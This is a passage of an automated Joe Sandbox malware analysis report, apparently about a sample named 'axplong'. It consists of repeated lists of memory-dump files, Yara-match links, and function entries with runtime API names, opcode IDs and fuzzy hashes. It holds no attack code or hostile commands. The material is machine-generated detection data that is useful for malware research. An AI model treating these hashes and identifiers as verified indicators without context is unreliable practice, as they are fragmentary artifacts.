                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: P#g$P#g
                                                                                                                                                                                                                                                    • API String ID: 2659868963-973111119
                                                                                                                                                                                                                                                    • Opcode ID: da11203c99fd616d1dc0e1b734fea05180e41b136812c26431ef39ca75f89289
                                                                                                                                                                                                                                                    • Instruction ID: fc6685d8f0a597efadde589bcf9218c48172b789a08ce52906900d4e14385128
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da11203c99fd616d1dc0e1b734fea05180e41b136812c26431ef39ca75f89289
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5F0E5B6D1021D6BC714FFE8DC01D8BB7AEDE06300B00852AF654A7601F6B0FA448BE9
                                                                                                                                                                                                                                                    Function 00687A60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00687A86
                                                                                                                                                                                                                                                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00687A8F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                                                                                                                                                                                                                                                    • String ID: @.g
                                                                                                                                                                                                                                                    • API String ID: 1432671424-1460316421
                                                                                                                                                                                                                                                    • Opcode ID: 8c005419d8d8eb183596e645bba9fed601d62b4fa212c76c20b1f90338316f4e
                                                                                                                                                                                                                                                    • Instruction ID: 9e08a9f2f5c0b31cf619f7d2410e4c4bd1269f5ebf8c1755b39941b9a22bc10f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c005419d8d8eb183596e645bba9fed601d62b4fa212c76c20b1f90338316f4e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29F02770A053045BC714BF78DC05E9ABBDEAF06365B24462DF5988B391EB71E9008794
                                                                                                                                                                                                                                                    Function 00672520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00672552
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: P#g$P#g
                                                                                                                                                                                                                                                    • API String ID: 2659868963-973111119
                                                                                                                                                                                                                                                    • Opcode ID: 43b243dc9616d5e63cf04cfd005c29181b4a02ef304e9e45f81310c400bfa46e
                                                                                                                                                                                                                                                    • Instruction ID: 7024164473c034b509f2f48228fd9ced4a351b86b577db6a17662c64322ddce7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43b243dc9616d5e63cf04cfd005c29181b4a02ef304e9e45f81310c400bfa46e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10F08271D1120DDBC714DF68D841A9EBBF6AF59304F1082AEF444A7200EA705A558B99
                                                                                                                                                                                                                                                    Function 0069B85C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0069B87E
                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0069B891
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                    • String ID: pContext
                                                                                                                                                                                                                                                    • API String ID: 548886458-2046700901
                                                                                                                                                                                                                                                    • Opcode ID: 69057cd8ff3c3a9c4662585e9d66fd39eb6ea8bc79d28677c4e5071972fc5fd3
                                                                                                                                                                                                                                                    • Instruction ID: d47fe7a640b7f77072b3773b8b3419dfb64fb08779a97328931514dc6fe91634
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69057cd8ff3c3a9c4662585e9d66fd39eb6ea8bc79d28677c4e5071972fc5fd3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42E02239B00218A7CB04B7A8E809CADB77F9E89720700011EF611A3381DB74EE018AD4
                                                                                                                                                                                                                                                    Function 00672E40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00672E50
                                                                                                                                                                                                                                                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00672E59
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
